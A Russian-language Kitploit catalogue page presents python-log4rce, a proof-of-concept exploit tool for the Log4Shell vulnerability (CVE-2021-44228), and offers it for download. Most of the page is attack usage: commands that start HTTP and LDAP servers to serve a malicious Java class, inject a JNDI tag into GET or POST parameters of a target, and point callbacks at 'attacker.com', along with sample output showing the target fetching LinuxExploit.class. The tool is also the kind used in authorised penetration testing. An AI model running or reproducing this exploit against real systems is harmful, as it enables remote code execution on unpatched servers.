Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
python-log4rce — Всё в одном PoC на чистом Python для CVE-2021-44228 | Kitploit
Инструменты/GitHubGitHub/alexandre-lavoie/python-log4rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubalexandre-lavoie/python-log4rce

python-log4rce

Всё в одном PoC на чистом Python для CVE-2021-44228

Репозиторий
1782914 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Python Log4RCE

Полноценный PoC на чистом Python3 для CVE-2021-44228.

Пример

root@kitploit:~
> python3 log4rce.py --target "linux" --payload "PAYLOAD" http -X POST --url "http://localhost:8080/" --data "address=###"
root@kitploit:~
INFO:HTTP:Running on local port 1337
INFO:HTTP:Remote target is http://127.0.0.1:1337/LinuxExploit.class
INFO:LDAP:Running on local port 1387
INFO:Log4J:Sending payload to http://localhost:8080/
INFO:LDAP:Query from ('127.0.0.1', 42554)
INFO:HTTP:Request from ('127.0.0.1', 55328) to /LinuxExploit.class
INFO:Log4J:Done!

Использование

Это CLI-инструмент. Все опции доступны в справке:

root@kitploit:~
python3 log4rce.py --help

Список довольно обширный, поэтому ниже приведена краткая сводка функциональности.

Режимы атак

Инструмент позволяет использовать несколько режимов атак. Эти атаки являются расширениями класса Log4RCE.

HTTP

Вы можете выполнить автоматическую HTTP-атаку на целевой URL.

Вы можете выполнить GET-запрос следующим образом:

root@kitploit:~
python3 log4rce.py http --url "http://www.vuln.com:1234/?vuln_param=###&param=123" --headers="P1=123&P2=123"

Вы можете выполнить POST-запрос следующим образом:

root@kitploit:~
python3 log4rce.py http -X POST --url "http://www.vuln.com:1234/" --data "vuln_param=###&param=123" --headers="P1=123&P2=123"

Предыдущее действие вставит JNDI-тег в ###.

Ручной режим

Если ни один из предыдущих вариантов не подходит, используйте этот режим для вывода JNDI-тега:

root@kitploit:~
python3 log4rce.py manual

Сетевые настройки

Инструмент позволяет гибко настраивать большинство сетевых параметров. Все внутренние серверы можно перенастроить на разные адреса в соответствии с удалёнными настройками.

HTTP-сервер

Вы можете настроить HTTP-сервер с помощью следующих параметров:

root@kitploit:~
python3 log4rce.py --http_port 1234 --http_rport 12345 --http_host "attacker.com"
root@kitploit:~
http_port: Локальный порт для запуска сервера.
http_rport: Порт, который будет использоваться удалённой машиной для доступа.
http_host: Имя хоста/IP, к которому будет обращаться удалённая машина.

LDAP-сервер

Вы можете настроить LDAP-сервер с помощью следующих параметров:

root@kitploit:~
python3 log4rce.py --ldap_port 1234 --ldap_rport 12345 --ldap_host "attacker.com"
root@kitploit:~
ldap_port: Локальный порт для запуска сервера.
ldap_rport: Порт, который будет использоваться удалённой машиной для доступа.
ldap_host: Имя хоста/IP, к которому будет обращаться удалённая машина.

Настройка

Инструмент поддерживает некоторые настройки.

Внедрение полезной нагрузки

Вы можете внедрить полезную нагрузку в Java-класс с помощью:

root@kitploit:~
python3 log4rce.py --payload "PAYLOAD"

Полезная нагрузка будет вставлена в строки "###".

Пользовательская Java-нагрузка

Вы можете создать собственный Java-класс следующим образом.

root@kitploit:~
javac -source 1.7 -target 1.7 /path/to/Exploit.java

Полученный .class можно запустить с помощью:

root@kitploit:~
python3 log4rce.py --java_class "/path/to/Exploit.class" ...

Примечание: Вы можете добавить строку "###" для возможности внедрения полезной нагрузки.

Скачать инструмент